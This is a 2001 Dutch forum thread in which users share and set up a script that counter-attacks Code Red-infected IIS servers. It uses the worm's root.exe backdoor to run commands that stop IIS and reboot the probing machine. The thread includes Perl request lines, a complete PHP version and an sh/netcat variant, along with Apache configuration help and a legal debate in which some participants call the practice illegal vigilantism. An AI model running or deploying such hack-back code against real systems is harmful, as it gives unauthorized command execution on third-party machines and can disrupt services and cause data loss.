Code Red perl script

Pagina: 1
Acties:
  • 226 views sinds 30-01-2008
  • Reageer

  • Aaargh!
  • Registratie: Januari 2000
  • Laatst online: 19-08 10:34

Aaargh!

Bow for me for I am prutser

Topicstarter
Script
ff in op je PC installeren, het disabled IIS op de aanvallende PC en reset hem daarna. :)

Those who do not understand Unix are condemned to reinvent it, poorly.


  • Yokidrink
  • Registratie: November 2000
  • Laatst online: 24-06 10:17
Op zaterdag 11 augustus 2001 17:49 schreef Aaargh! het volgende:
Script
ff in op je PC installeren, het disabled IIS op de aanvallende PC en reset hem daarna. :)
Wel ff waarschuwen volgende keer dat ie eerst probeert je pc te 'attacken' aangezien het je pc reboot indien het infected is met dat red alert virus |:(
***
If you were a Code Red infected IIS then the command just sent to port 80 was to stop iis and to reboot your machine. If you aren't infected, then you have nothing to worry about, otherwise.. you should really use a secure webserver don't you think?.. one that doesn't let people in a gaping back door to do stuff like this...)
****

(niet dat het bij mij gebeurde... maar het zal je maar overkomen)

  • Aaargh!
  • Registratie: Januari 2000
  • Laatst online: 19-08 10:34

Aaargh!

Bow for me for I am prutser

Topicstarter
Op zaterdag 11 augustus 2001 17:56 schreef thoth het volgende:

[..]

Wel ff waarschuwen volgende keer dat ie eerst probeert je pc te 'attacken' aangezien het je pc reboot indien het infected is met dat red alert virus |:(
nee, hij reset alleen maar als er een attack plaatsvind
code:
1
if (length ($ENV{QUERY_STRING}) > 0) {

dus alleen een machine die is EN mij aanvalt besmet word gereset (en iis word uitgezet).
de worm is na de reset foetsie => weer een besmetting minder.
de attack triggered dus de reset.

Those who do not understand Unix are condemned to reinvent it, poorly.


  • Ramon
  • Registratie: Juli 2000
  • Laatst online: 08:29
Op zaterdag 11 augustus 2001 18:32 schreef Aaargh! het volgende:

[..]

nee, hij reset alleen maar als er een attack plaatsvind
code:
1
if (length ($ENV{QUERY_STRING}) > 0) {

dus alleen een machine die is EN mij aanvalt besmet word gereset (en iis word uitgezet).
de worm is na de reset foetsie => weer een besmetting minder.
de attack triggered dus de reset.
alleen moet je dan wel de IIS patch draaien anders wordt je gewoon weer geinvecteerd... ik weet niet of dat ook op jou paginaatje staat?

Check mijn V&A ads: https://tweakers.net/aanbod/user/9258/


  • Aaargh!
  • Registratie: Januari 2000
  • Laatst online: 19-08 10:34

Aaargh!

Bow for me for I am prutser

Topicstarter
Op zaterdag 11 augustus 2001 18:35 schreef Tampie2000 het volgende:

[..]

alleen moet je dan wel de IIS patch draaien anders wordt je gewoon weer geinvecteerd... ik weet niet of dat ook op jou paginaatje staat?
ik weet niks van IIS, ik heb 't script ook maar van slashdot. maar hij voert wel een commando uit om IIS uit te zetten.
code:
1
my $iis_stop_req = new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+iisreset+/stop");

of IIS na de reboot terug is zou ik niet weten.

Those who do not understand Unix are condemned to reinvent it, poorly.


  • 0siris
  • Registratie: Augustus 2000
  • Laatst online: 07:10
ik ben er net ff mee bezig geweest: het enige wat ik eigenlijk heb gedaan om .ida als cgi te behandelen is een regel in /etc/apache/srm.conf op te nemen met daarin:
code:
1
Addhandler cgi-script .ida

in /etc/apache/srm.conf stond dat mijn documentroot /var/www was, dus daar heb ik die tekst in een bestandje genaamd default.ida gezet.

das toch genoeg?

Nou hopen dat er vissen bijten :)

hmmz..ik krijg:
code:
1
You don't have permission to access /default.ida on this server

terwijl het bestand /var/www/default.ida de volgende rechten heeft:
code:
1
4.0k -rw-r--r--    1 root     root     3.6k Aug 11 18:51 default.ida

Zou dat aan een VirtualHost kunnen liggen? Ik heb van het ipadres zelf ook een virtualhost gemaakt. Moet ik die laten verwijzen naar dezelfde dir als de DocumentRoot directive? (ik weet niet waar Code Red naar kijkt, ipadressen of hostnames)

ach...in een volgend leven lach je er om!


  • RvdH
  • Registratie: Juni 1999
  • Laatst online: 28-07 15:42

RvdH

Uitvinder van RickRAID

Op zaterdag 11 augustus 2001 18:56 schreef 0siris het volgende:
ik ben er net ff mee bezig geweest: het enige wat ik eigenlijk heb gedaan om .ida als cgi te behandelen is een regel in /etc/apache/srm.conf op te nemen met daarin:
code:
1
Addhandler cgi-script .ida

in /etc/apache/httpd.conf stond dat mijn documentroot /var/www was, dus daar heb ik die tekst in een bestandje genaamd default.ida gezet.

das toch genoeg?

Nou hopen dat er vissen bijten :)

hmmz..ik krijg:
code:
1
You don't have permission to access /default.ida on this server

terwijl het bestand /var/www/default.ida de volgende rechten heeft:
code:
1
4.0k -rw-r--r--    1 root     root     3.6k Aug 11 18:51 default.ida
Check je error_log bestand, waarschijnlijk moet je ExecCGI aanzetten voor /var/www.

  • Grum
  • Registratie: Juni 2001
  • Niet online
dit is niet legaal he ...

  • 0siris
  • Registratie: Augustus 2000
  • Laatst online: 07:10
Op zaterdag 11 augustus 2001 19:07 schreef Grum_ het volgende:
dit is niet legaal he ...
:?

ach...in een volgend leven lach je er om!


  • 0siris
  • Registratie: Augustus 2000
  • Laatst online: 07:10
Check je error_log bestand, waarschijnlijk moet je ExecCGI aanzetten voor /var/www.
verbazingwekkend genoeg krijg ik dit te zien:
code:
1
2
3
[Sat Aug 11 19:13:26 2001] [crit] [client 62.censuur] (13)Permission denied:
 /home/osiris/public_html/.htaccess pcfg_openfile: unable to check htaccess
file, ensure it is readable

en dat terwijl ik een virtualhost heb die dit doet met het ipadres zelf:
code:
1
2
3
4
<VirtualHost 212.censuur>
      DocumentRoot /home[b]/gertjan/[/b]public_html
      ServerName 212.censuur
</VirtualHost>

en als ik die default.ida vanaf de prompt uitvoer, krijg ik een error:
code:
1
2
3
4
5
6
./default.ida
Can't locate LWP/UserAgent.pm in @INC (@INC contains: 
/usr/lib/perl5/5.005/i386-linux /usr/lib/perl5/5.005 /usr/local/lib/site_perl/i386-linux 
/usr/local/lib/site_perl /usr/lib/perl5 .) at ./default.ida line 30.

BEGIN failed--compilation aborted at ./default.ida line 30.

ach...in een volgend leven lach je er om!


  • Grum
  • Registratie: Juni 2001
  • Niet online
het is niet legaal om om watvoor reden dingen op een remote pc te doen en em dan ook nog te resetten

  • Ramon
  • Registratie: Juli 2000
  • Laatst online: 08:29
Op zaterdag 11 augustus 2001 19:19 schreef Grum_ het volgende:
het is niet legaal om om watvoor reden dingen op een remote pc te doen en em dan ook nog te resetten
haha :)

ze komen toch zelf op die site?

en ze hebben toch zelf IIS niet gepatched?

dus ik het ook de gebruikers' schuld!

Check mijn V&A ads: https://tweakers.net/aanbod/user/9258/


  • Ronald
  • Registratie: Juli 2000
  • Laatst online: 09:03
Op zaterdag 11 augustus 2001 19:07 schreef Grum_ het volgende:
dit is niet legaal he ...
Nee? is het dan legaal om hack attempts op mijn server los te laten?
heb er 593 gehad.
moet ik nu 593 mensen aanklagen ofzo :?
Dit script zal de versprijding en instandhouding van code red sterk verminderen. Iets waar iedereen bij gebaad is.

PV Output - Obdam; SolarEdge SE5K 'Voor korte strings'; 12x350Wp Oost-West 13°; 8x415Wp Zuid 10°; Totaal 7520Wp.


  • Grum
  • Registratie: Juni 2001
  • Niet online
ik ga heel hard lachen als een groot bedrijf schade gaat claimen omdat hun servers zijn gereset en dus vitale informatie verloren is gegaan/transacties zijn misgegaan

reken maar dat dit zal gebeuren

  • Aaargh!
  • Registratie: Januari 2000
  • Laatst online: 19-08 10:34

Aaargh!

Bow for me for I am prutser

Topicstarter
Op zaterdag 11 augustus 2001 19:24 schreef Grum_ het volgende:
ik ga heel hard lachen als een groot bedrijf schade gaat claimen omdat hun servers zijn gereset en dus vitale informatie verloren is gegaan/transacties zijn misgegaan

reken maar dat dit zal gebeuren
hoezo ?
ik mag whatever programma op mijn PC installeren, ik doe er verder niks mee , ZIJ starten het programma op, en dat terwijl ZIJ illegaal bezig zijn (hackpoging op mijn systeem)

Those who do not understand Unix are condemned to reinvent it, poorly.


  • Grum
  • Registratie: Juni 2001
  • Niet online
dus je bent er mee eens dat een hackpoging niet legaal is ?

en wat er op dat moment terug gebeurt is niet hetzelfde ?

tuurlijk is hun admin schuldig aan het niet installeren van de juiste updates maar jij bent als beheerder van de pc die de infected pc reset toch echt wel wat meer schuldig omdat JIJ zelf de software hebt geinstalleerd

dit heet het recht in eigen hand nemen en dat mag volgens geen 1 wet :)

het excuus van 'ja ik installeer gewoon een programma' valt dus ook weg omdat je het installeerd en DUS ben je verantwoordelijk

als iemand je auto steelt en iemand er mee plat rijdt is de eigenaar toch ook niet schuldig ? en hoeft de auto toch ook niet onklaar gemaakt te worden en als dat wel gebeurt kan de eigenaar degene die de auto onklaar heeft gemaakt aanklagen ... same story here

  • 0siris
  • Registratie: Augustus 2000
  • Laatst online: 07:10
Op zaterdag 11 augustus 2001 19:34 schreef Grum_ het volgende:
tuurlijk is hun admin schuldig aan het niet installeren van de juiste updates maar jij bent als beheerder van de pc die de infected pc reset toch echt wel wat meer schuldig omdat JIJ zelf de software hebt geinstalleerd
En als code red nu zou proberen andere websites neer te halen? of als ik nou blijf volhouden dat het zomaar op mijn server terechtkwam? dat is namelijk wel het geval met code red zelf!

ach...in een volgend leven lach je er om!


  • Grum
  • Registratie: Juni 2001
  • Niet online
goed lezen ... als admin ben je schuldig aan het niet updaten (wat geen misdaad is) maar als jij een programma installed dat een andere pc onderuit haalt ben JIJ strafbaar

  • 0siris
  • Registratie: Augustus 2000
  • Laatst online: 07:10
Op zaterdag 11 augustus 2001 19:04 schreef RickJansen het volgende:
Check je error_log bestand, waarschijnlijk moet je ExecCGI aanzetten voor /var/www.
hmmz...ik ben er niet met alleen "Options ExecCGI" in httpd.conf . Maar hoe moet dat wel? kan ik dat per virtual opgeven ofzo? of met via <directory> ofzo? Ik zal wel weer te moeilijk denken :)
code:
1
2
3
[Sat Aug 11 19:43:34 2001] [error] [client censuur]
Options ExecCGI is off in this directory:
/home/osiris/public_html/default.ida

ach...in een volgend leven lach je er om!


  • Ramon
  • Registratie: Juli 2000
  • Laatst online: 08:29
Op zaterdag 11 augustus 2001 19:51 schreef Grum_ het volgende:
goed lezen ... als admin ben je schuldig aan het niet updaten (wat geen misdaad is) maar als jij een programma installed dat een andere pc onderuit haalt ben JIJ strafbaar
ja :)

maar niet voor de volle honderd procent want het is gewoon de taak van een goede admin om die patches te installeren.

Dus, mocht er hier een rechtzaak van ontstaan dan heb je erg veel kans dat de rechter gewoon zegt; tja... dan had de admin maar voorzorgsmaatregelen moeten treffen.

(een goedgeinformeerde rechter dan he? :) )

Check mijn V&A ads: https://tweakers.net/aanbod/user/9258/


  • 0siris
  • Registratie: Augustus 2000
  • Laatst online: 07:10
goed lezen ... als admin ben je schuldig aan het niet updaten (wat geen misdaad is) maar als jij een programma installed dat een andere pc onderuit haalt ben JIJ strafbaar
OK. Best. Maar wie helpt ff configgen? (zie andere posts in dit topic van mij) :)

ach...in een volgend leven lach je er om!


Verwijderd

Ik vat één ding niet in dat script...

Hij zet eerst IIS uit, (new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+iisreset+/stop"); )

En probeert daarna de server te resetten: (new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5"); )

Maar als in de eerste stap IIS al is afgesloten, hoe komt die tweede request dan op de machine aan???
(enige wat ik kan bedenken is dat het zo snel achter elkaar gebeurt dat IIS nog niet is afgesloten.)

Verwijderd

Op zaterdag 11 augustus 2001 19:17 schreef 0siris het volgende:

[/code]
en als ik die default.ida vanaf de prompt uitvoer, krijg ik een error:
code:
1
2
3
4
5
6
./default.ida
Can't locate LWP/UserAgent.pm in @INC (@INC contains: 
/usr/lib/perl5/5.005/i386-linux /usr/lib/perl5/5.005 /usr/local/lib/site_perl/i386-linux 
/usr/local/lib/site_perl /usr/lib/perl5 .) at ./default.ida line 30.

BEGIN failed--compilation aborted at ./default.ida line 30.
Dit is een Perl error. Hij kan de module LWP::UserAgent niet vinden. Ik zal ff een lijstje maken met de modules die je nodig hebt en waar je ze kunt downloaden.

De modules die je nodig hebt zijn:

* http://www.cpan.org/modules/by-module/WWW/libwww-perl-5.53.tar.gz
Dit is libwww, waarin LWP::UserAgent zit.

* http://www.cpan.org/modules/by-module/URI/URI-1.15.tar.gz
Dit is URI, deze heb je nodig om libwww te gebruiken.

* http://www.cpan.org/modules/by-module/MIME/MIME-Base64-2.12.tar.gz
Deze schijn je ook nodig te hebben voor LWP::UserAgent.

* http://www.cpan.org/modules/by-module/HTML/HTML-Parser-3.25.tar.gz
En deze heb je ook nodig.

* http://www.cpan.org/modules/by-module/Net/libnet-1.0703.tar.gz
En deze ook. :)

* http://www.cpan.org/modules/by-module/Digest/Digest-Perl-MD5-1.5.tar.gz
En uiteindelijk deze...

Je kan ze allemaal compileren d.m.v. een "perl Makefile.pl ; make ; make test ; make install" te geven.

Compileer ze in deze volgorde:
URI
MIME-Base64
HTML-Parser
LibNet
Digest-MD5
Libwww

Op zich maakt de volgorde niet zoveel uit, behalve dat "libwww" als laatste moet.
Nu zou hij het moeten doen.

  • Aaargh!
  • Registratie: Januari 2000
  • Laatst online: 19-08 10:34

Aaargh!

Bow for me for I am prutser

Topicstarter
Dat vat ik dus ook niet :?

NEways: Osiris, domme vraag, maar heb je apache gerestart na config veranderen :? :P

Those who do not understand Unix are condemned to reinvent it, poorly.


  • 0siris
  • Registratie: Augustus 2000
  • Laatst online: 07:10
[quote
NEways: Osiris, domme vraag, maar heb je apache gerestart na config veranderen :? :P
[/quote]
jazekers! apachectl restart werkt uitstekend. Alleen dat ding nog niet. Ik moet wel veel perl dingen downloaden om dat werkend te krijgen zeg! pffff....

ach...in een volgend leven lach je er om!


  • 0siris
  • Registratie: Augustus 2000
  • Laatst online: 07:10
Op zaterdag 11 augustus 2001 20:03 schreef Anthraxx het volgende:
De modules die je nodig hebt zijn:
<Tig modules>
Sjeez...bedankt voor het opzoeken, maar dit gaat me wel ver voor een beetje vertier :)

ach...in een volgend leven lach je er om!


  • Grum
  • Registratie: Juni 2001
  • Niet online
nogmaals ... bedrijven zullen 100% zeker de rechtzaak winnen mochten ze die starten ... dus weet wat je doet

  • Leon
  • Registratie: Maart 2000
  • Laatst online: 19-08 12:12

Leon

Rise Of The Robots

Op zaterdag 11 augustus 2001 21:13 schreef Grum_ het volgende:
nogmaals ... bedrijven zullen 100% zeker de rechtzaak winnen mochten ze die starten ... dus weet wat je doet
uit de ondertitel van Grum_:
ZEIKMODE = ON;
:P

en als je wilt zorgen dat anderen de source kunnen downen moet je default.txt in je www root plaatsen of heb ik het mis :? :)

bij mij werkt het nu als ik "perl default.ida" intik maar niet als ik met een browser er naartoe ga.. ;(

(heb die regel toegevoegd in srm.conf)

Eeuwige n00b


Verwijderd

Op zaterdag 11 augustus 2001 21:04 schreef 0siris het volgende:

[..]

Sjeez...bedankt voor het opzoeken, maar dit gaat me wel ver voor een beetje vertier :)
*grin*

NP, ik moest ze voor mijn eigen server ook opzoeken :)

Dus die lijst met links had ik al.

Verwijderd

Op zaterdag 11 augustus 2001 21:17 schreef fazer het volgende:

<knip>

bij mij werkt het nu als ik "perl default.ida" intik maar niet als ik met een browser er naartoe ga.. ;(

(heb die regel toegevoegd in srm.conf)
Dit probleem had ik ook. Ik heb het opgelost om mijn httpd.conf te veranderen :

* Zoek naar <Directory "/var/lib/apache/htdocs">
(/var/lib/apache/htdocs/ kan bij jou (of iemand anders) anders zijn dan dit voorbeeld)

* Daar moet je Achter de (globale) optie "Options" , +ExecCGI zetten.

Dus dan komt het er zo uit te zien:
Options Indexes FollowSymLinks +ExecCGI

* Voeg ergens een nieuwe regel met:
AddHandler cgi-script .ida
(persoonlijk heb ik het onder "AddHandler cgi-script .cgi" neergezet :) )

* Restart Apache met "apachectl" of op een andere manier.

* als het goed is moet het werken. Zoniet, doe eens een "chmod 755 default.ida"

Dit heb ik persoonlijk moeten veranderen, ik weet niet hoe het met andere distributies zit (ik gebruik Slackware 7.1)

  • Leon
  • Registratie: Maart 2000
  • Laatst online: 19-08 12:12

Leon

Rise Of The Robots

Vreemd.... :?
als ik "perld default.ida" doe krijg ik dit:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#perl default.ida
Content-Type: text/html

    <p>
      <h1>WELCOME NTK READERS!</h1>
    </p> 
    <p>
      <H2>If you are reading this page, then you are probably curious... </H2>
    </p>
    <p>
      This page is actually a script that will connect to your machine and
      try to shut it down.  Since you are seeing this you probably aren't a
      Code Red infected box.  
    </p>
<knip>

Maar met mijn browser werkt het nog steeds niet.. ;(
en dat terwijl ik in httpd.conf dit heb staan:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<Directory "/usr/home/www/data">
    
#
# This may also be "None", "All", or any combination of "Indexes",
# "Includes", "FollowSymLinks", "ExecCGI", or "MultiViews".
#
# Note that "MultiViews" must be named *explicitly* --- "Options All"
# doesn't give it to you.
# 
    Options Indexes FollowSymLinks MultiViews +ExecCGI
         
#
# This controls which options the .htaccess files in directories can
# override. Can also be "All", or any combination of "Options", "FileInfo",
# "AuthConfig", and "Limit"
#
    AllowOverride All
#
# Controls who can get stuff from this server.
#
    Order allow,deny
    Allow from all
</Directory>

en dit:
code:
1
2
3
4
5
6
7
8
9
10
11
12
#
    # AddHandler allows you to map certain file extensions to "handlers",
    # actions unrelated to filetype. These can be either built into the server
    # or added with the Action command (see below)
    #
    # If you want to use server side includes, or CGI outside
    # ScriptAliased directories, uncomment the following lines.
    #
    # To use CGI scripts:
    #
    AddHandler cgi-script .cgi
    AddHandler cgi-script .ida

En toch werkt het niet :?

Eeuwige n00b


  • Apache
  • Registratie: Juli 2000
  • Laatst online: 17-08 14:28

Apache

amateur software devver

PHP:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?
echo "<h2>Shutting down of IIS/WIN2K systems infected with CODE RED</h2>
<br /><br />this is yet another proof that the windows os sucks ass, so install linux!
<br /><br />if your system is not infected this page will do no harm to your system.
<br /><br />This script also notify's the owner his pc has been infected before it reboots.";

    if (getenv(HTTP_X_FORWARDED_FOR)){
    $ip = getenv(HTTP_X_FORWARDED_FOR);
    } else {
    $ip = getenv(REMOTE_ADDR);
    }

@file('http://'.$ip.'/scripts/root.exe?%2Fc+net+send+%25computername%25+This+machine+has+the+CODE+RED+II+worm%2C+please+shut+down+immediately+and+then+take+appropriate+measures%21%20See%20http%3A%2F%2Fvil.mcafee.com%2FdispVirus.asp%3Fvirus_k%3D99177%26');
@file('http://'.$ip.'/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5');
@file('http://'.$ip.'/scripts/root.exe?/c+iisreset+/stop') or die("<br /><br /><b>You are not infected by code red</b>");
?>

dit zou moeten werken denk ik ... als iemand hier die geinfecteerd is ff naar http://bserver.dhs.org:4000/default.ida zou willen surfen :)

If it ain't broken it doesn't have enough features


Verwijderd

Op zaterdag 11 augustus 2001 21:53 schreef fazer het volgende:
Vreemd.... :?

enz, enz...
Krijg je een error in error_log of je browser?

Zoja: Wat zegt die error?
Zoniet: Staan je permissies goed? (van default.ida)

EDIT:

Ik zie net in mijn eigen httpd.conf dat ik ook nog een regel met "AddType text/html .ida" heb toegevoegd. Probeer dat eens?

  • Leon
  • Registratie: Maart 2000
  • Laatst online: 19-08 12:12

Leon

Rise Of The Robots

in mijn httpd-error.log:
code:
1
2
[Sat Aug 11 22:40:05 2001] [error] (8)Exec format error: exec of /usr/home/www/data/default.ida
[Sat Aug 11 22:40:05 2001] [error] [client xxx.xxx.xxx.xxx] Premature end of script headers: /usr/home/www/data/default.ida

als dat zo is vind ik het vreemd dat ie het wel doet als ik "perl default.ida" in tik.. :?

Eeuwige n00b


  • serkoon
  • Registratie: April 2000
  • Niet online

serkoon

mekker.

sh-script, netcat nodig, niet uitvoerig getest:
code:
1
2
3
4
5
#!/bin/sh
echo "Content-type: text/html"
echo
echo `date` - $REMOTE_ADDR | sed s/::ffff:// | sed s/CEST\ 2001\ // >>codered.log
/bin/cat /usr/local/www/data/GET /usr/local/bin/nc -w 60 `echo $REMOTE_ADDR | sed s/::ffff://` 80

Edit: in de GET file staat gewoon iets als GET /scripts/root.exe?/c+watdanook HTTP/1.0
[enter]
[enter]

  • RvdH
  • Registratie: Juni 1999
  • Laatst online: 28-07 15:42

RvdH

Uitvinder van RickRAID

Op zaterdag 11 augustus 2001 20:03 schreef Anthraxx het volgende:

[..]


Je kan ze allemaal compileren d.m.v. een "perl Makefile.pl ; make ; make test ; make install" te geven.

Compileer ze in deze volgorde:
URI
MIME-Base64
HTML-Parser
LibNet
Digest-MD5
Libwww

Op zich maakt de volgorde niet zoveel uit, behalve dat "libwww" als laatste moet.
Nu zou hij het moeten doen.
Hmjaja, maar dat kan veel makkelijker :)
perl -MCPAN -e 'install URI'
perl -MCPAN -e 'install MIME-Base64'
perl -MCPAN -e 'install HTML-Parser'
perl -MCPAN -e 'install LibNet'
perl -MPCAN -e 'install Digest-MD5'
perl -MCPAN -e 'install Libwww'

Hoef je ook niks te downloaden enzo..

Verwijderd

Op zondag 12 augustus 2001 00:49 schreef RickJansen het volgende:

[..]

Hmjaja, maar dat kan veel makkelijker :)
perl -MCPAN -e 'install URI'
perl -MCPAN -e 'install MIME-Base64'
perl -MCPAN -e 'install HTML-Parser'
perl -MCPAN -e 'install LibNet'
perl -MPCAN -e 'install Digest-MD5'
perl -MCPAN -e 'install Libwww'

Hoef je ook niks te downloaden enzo..
Gaaf! Die wist ik nog niet :)

En Fazer:

Staat in je default.ida je path naar perl wel goed? Dus edit default.ida en op de 1ste regel moet zoiets staan als "#!/usr/bin/perl -w" verander dat (als het nodig is) naar de goede directry waarin perl staat.

Misschien dat het daaraan zou kunnen liggen.

  • Grum
  • Registratie: Juni 2001
  • Niet online
kan nummer 1 die gesued word het ook even laten weten ?

  • _JGC_
  • Registratie: Juli 2000
  • Nu online
Dit is 100% legaal (vind ik):

Veel mensen draaien IIS zonder dat ze het weten. Het zal hun dan ook een worst zijn als die uitgeschakeld wordt. Denk eerder dat ze er blij mee zijn omdat het hun 95% CPU belasting scheelt.

Veel mensen draaien en gebruiken een slechte IIS. Als ze er dan achter komen dat hun server ineens down is, zullen ze wel ff achter de oren krabben waarom dat zo is.

Er zijn nog genoeg servers die besmet zijn met de eerste variant van Code red, dus je kunt kiezen: of defaced zijn, of gewoon helemaal nix...

En denk maar niet dat er zoveel amerikaantjes zijn die het gedaan krijgen om ons aan te klagen. Mogen ze eerst naar de ISP om onze gegevens...

  • _JGC_
  • Registratie: Juli 2000
  • Nu online
Op zaterdag 11 augustus 2001 20:00 schreef Operations het volgende:
Ik vat één ding niet in dat script...

Hij zet eerst IIS uit, (new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+iisreset+/stop"); )

En probeert daarna de server te resetten: (new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5"); )

Maar als in de eerste stap IIS al is afgesloten, hoe komt die tweede request dan op de machine aan???
(enige wat ik kan bedenken is dat het zo snel achter elkaar gebeurt dat IIS nog niet is afgesloten.)
Voor zover ik weet zet ie de service van IIS op disabled. Vervolgens start ie je systeem opnieuw en wordt IIS niet meer geladen.

  • _JGC_
  • Registratie: Juli 2000
  • Nu online
BTW: Om het aan de praat te krijgen heb ik het volgende gedaan:

geplaatst in D:/apache/htdocs
eerste regel veranderd in !#d:/perl/bin/perl

en in httpd.conf:
AddHandler cgi-script .ida

  • Grum
  • Registratie: Juni 2001
  • Niet online
Op zondag 12 augustus 2001 12:14 schreef _JGC_ het volgende:
Dit is 100% legaal (vind ik):
fout 1 :)

een rechter zal daar maling aan hebben
Veel mensen draaien IIS zonder dat ze het weten. Het zal hun dan ook een worst zijn als die uitgeschakeld wordt. Denk eerder dat ze er blij mee zijn omdat het hun 95% CPU belasting scheelt.
uhm ... IIS niet draait zonder dat je het weet ? zover ik weet moet je het toch echt zelf aanzetten :)
Veel mensen draaien en gebruiken een slechte IIS. Als ze er dan achter komen dat hun server ineens down is, zullen ze wel ff achter de oren krabben waarom dat zo is.
en als ze gegevens kwijt zijn of gedupeerd krabben ze achter de oren van hun advocaten
Er zijn nog genoeg servers die besmet zijn met de eerste variant van Code red, dus je kunt kiezen: of defaced zijn, of gewoon helemaal nix...
of gewoon goede producten uitbrengen OF netjes updaten (het is handig als mensen onder hun steen vandaan komen)
En denk maar niet dat er zoveel amerikaantjes zijn die het gedaan krijgen om ons aan te klagen. Mogen ze eerst naar de ISP om onze gegevens...
en je denkt dat die niet worden vrij gegeven ? grapjas ... dat word bij misbruik ALTIJD gedaan

ik ga hard lachen als er iemand dood word gesued ...

het is echt [b]NIET[/b] legaal so be warned

  • igmar
  • Registratie: April 2000
  • Laatst online: 29-06 18:56

igmar

ISO20022

ik ga heel hard lachen als een groot bedrijf schade gaat claimen omdat hun servers zijn gereset en dus vitale informatie verloren is gegaan/transacties zijn misgegaan
Dit is legaal. Het is geen inbraak, want die is al gebeurd.

De 'vitale' informatie gaat zeker verloren als Code Red 2 komt kijken, en aangezien bedrijven erg huiverig zijn om hun reputatie te verliezen zal het met die claims wel mee gaan vallen.

  • igmar
  • Registratie: April 2000
  • Laatst online: 29-06 18:56

igmar

ISO20022

nogmaals ... bedrijven zullen 100% zeker de rechtzaak winnen mochten ze die starten ... dus weet wat je doet
Waar baseer jij die wijsheid op als ik vragen mag ? Er is geen sprake van moedwillig toegang verschaffen, want dat is al gebeurd.

  • pinball
  • Registratie: Oktober 1999
  • Niet online

pinball

Electric Monk

Op zondag 12 augustus 2001 16:59 schreef igmar het volgende:

[..]

Waar baseer jij die wijsheid op als ik vragen mag ? Er is geen sprake van moedwillig toegang verschaffen, want dat is al gebeurd.
Dus als iemand anders de plaatselijke juwelier ramkraakt is het ok als ik daarna ff meegraai in de etalage?

BS.

Ook met alle goede bedoelingen ter wereld blijft het illegaal om jezelf toegang te verschaffen tot andere systemen.

Ik denk persoonlijk ook dat het wel mee zal vallen met rechtzaken, maar dat dacht Dave McOwen ook, en die kijkt nu tegen 30 jaar cel en iets van fl. 300.000,- boete aan.

Straks niet gaan janken als jouw scriptje _perongeluk_ de webserver van de staat Georgia uitzet, en je (al is het maar 1 tiende deel van) Dave z'n straf krijgt.

Whenever you find that you are on the side of the majority, it is time to reform.


  • _JGC_
  • Registratie: Juli 2000
  • Nu online
Dit script zet code red inclusief IIS uit. het sloopt dus helemaal nix. een goede admin installeert de patch en start daarna de service weer. Je sloopt toch niets? Je zorgt er alleen voor dat het virus zich niet verder verspreidt.

Antivirus maatschappijen krijgen toch ook geen rechtzaak omdat er een optie "When infected: Delete without questions" in hun antivirus software zit?
Jezelf als systeembeheerder voordoen en dan nooit kijken of er ook bugs zijn vind ik net zo debiel als bovenstaande optie in je virusscanner aanzetten.

verder zit ik op het sjello netwerk, en 75% van alle code red aanvallen komen vanuit het chello netwerk hier, lijkt me dus allemaal debiele thuisgebruikers die niet eens weten dat ze IIS hebben draaien.

edit:

O ja, je kunt ook de rechtszaak omdraaien:
Zij proberen op jou server in te breken, dit zorgt ervoor dat dat script gaat draaien, kost CPU power + hdd access, dus kost mij dat resources. Kan ik hun toch ook aanklagen? Ik kan nog altijd zeggen dat ik niet wist dat dit script op mijn server draaide en dat het best wel eens een virus ofzow kon zijn :) . Dat is nml hun verweer dan ook.

  • pinball
  • Registratie: Oktober 1999
  • Niet online

pinball

Electric Monk

OK... ik zal eerst ff de crap afhandelen:
Op zondag 12 augustus 2001 17:46 schreef _JGC_ het volgende:
Dit script zet code red inclusief IIS uit. het sloopt dus helemaal nix. een goede admin installeert de patch en start daarna de service weer. Je sloopt toch niets? Je zorgt er alleen voor dat het virus zich niet verder verspreidt.
Welk gedeelte van "ongeoorloofde toegang" begrijp je niet? Inbreken bij de juwelier en niets meenemen is _ook_ strafbaar. Voor computers geldt hetzelfde.
Antivirus maatschappijen krijgen toch ook geen rechtzaak omdat er een optie "When infected: Delete without questions" in hun antivirus software zit?
Jezelf als systeembeheerder voordoen en dan nooit kijken of er ook bugs zijn vind ik net zo debiel als bovenstaande optie in je virusscanner aanzetten.
Nee, en M$ wordt ook niet aangeklaagd omdat ze format.exe meeleveren met windows. Lees de gebruikersovereenkomst van elk willekeurig softwarepakket nog eens door.
verder zit ik op het sjello netwerk, en 75% van alle code red aanvallen komen vanuit het chello netwerk hier, lijkt me dus allemaal debiele thuisgebruikers die niet eens weten dat ze IIS hebben draaien.
Mag ik hieruit afleiden dat debielen geen rechten hebben? Als in: "De plaatselijke juwelier beroven is strafbaar, maar je debiele buurman beroven is geen probleem."


En dan nu de enige _enigszins_ verstandige opmerking:
edit:

O ja, je kunt ook de rechtszaak omdraaien:
Zij proberen op jou server in te breken, dit zorgt ervoor dat dat script gaat draaien, kost CPU power + hdd access, dus kost mij dat resources. Kan ik hun toch ook aanklagen? Ik kan nog altijd zeggen dat ik niet wist dat dit script op mijn server draaide en dat het best wel eens een virus ofzow kon zijn :) . Dat is nml hun verweer dan ook.
Een rechtszaak aanspannen (of: "de autoriteiten inschakelen", rechtszaken zijn zo amerikaans) zou inderdaad de juiste manier zijn.
In de meeste beschaafde landen is eigenrichting (en dat is dit anti-CR-script) verboden. Net zomin als je de kinderverkrachter z'n ballen eraf mag snijden (hoe graag je dat ook zou willen) zodat ie het nooit meer doet, mag je ook niet iemands webserver aanpassen zodat ie je niet meer lastig valt.

Zo.

Terzijde: ik vind dat anti-CR-script een prima idee, en ik denk ook dat het met eventuele aanklachten wel mee zal vallen. Ik vind het alleen nogal raar dat sommige mensen hier zich in allerlei bochten wringen om het 'legaal' te krijgen. Dat is het niet. Strafbaar wel.

Whenever you find that you are on the side of the majority, it is time to reform.


